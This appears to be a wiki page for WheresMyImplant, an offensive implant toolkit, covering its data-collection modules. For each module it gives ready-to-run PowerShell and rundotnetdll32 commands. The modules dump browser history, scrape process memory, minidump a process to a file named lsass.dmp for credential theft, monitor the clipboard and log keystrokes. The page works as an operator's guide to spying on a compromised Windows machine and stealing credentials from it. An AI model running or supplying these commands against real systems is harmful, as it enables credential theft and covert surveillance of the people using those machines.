Collection Modules

Browser History

Overview

Reads the bookmarks, favorites, and history from Internet Explorer/Edge, Firefox, and Chrome;

PowerShell

[WheresMyImplant.Collection]::DumpBrowserHistory()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,DumpBrowserHistory

Memory Scraper

Overview

Reads the memory of a process and looks for interesting data.

PowerShell

[WheresMyImplant.Collection]::ReadProcessMemory("495")

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,ReadProcessMemory "495"

Memory Dump

Overview

Creates a minidump of a processes memory.

PowerShell

[WheresMyImplant.Collection]::MiniDump("495", "lsass.dmp")

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,MiniDump "495","lsass.dmp"

Clipboard

Overview

Monitors the clipboard for copied data.

PowerShell

[WheresMyImplant.Collection]::Clipboard()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,Clipboard

Keylogger

Overview

Monitors the for key presses.

PowerShell

[WheresMyImplant.Collection]::Keylogger()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,Keylogger

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Collection Modules

Browser History

Overview

PowerShell

rundotnetdll32

Memory Scraper

Overview

PowerShell

rundotnetdll32

Memory Dump

Overview

PowerShell

rundotnetdll32

Clipboard

Overview

PowerShell

rundotnetdll32

Keylogger

Overview

PowerShell

rundotnetdll32

Clone this wiki locally